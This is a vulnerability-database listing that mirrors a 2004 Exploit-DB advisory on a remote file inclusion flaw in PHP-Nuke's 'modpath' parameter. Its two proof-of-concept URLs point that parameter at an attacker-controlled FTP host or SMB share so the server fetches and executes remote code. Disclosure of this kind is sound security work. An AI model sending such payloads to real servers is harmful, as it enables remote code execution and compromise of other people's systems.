Lucene search

K
exploitdbWaraxeEDB-ID:24127
HistoryMay 17, 2004 - 12:00 a.m.

PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion

2004-05-1700:00:00
waraxe
www.exploit-db.com
16

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/10365/info

PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.

If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/

AI Score

7.4

Confidence

Low

Related for EDB-ID:24127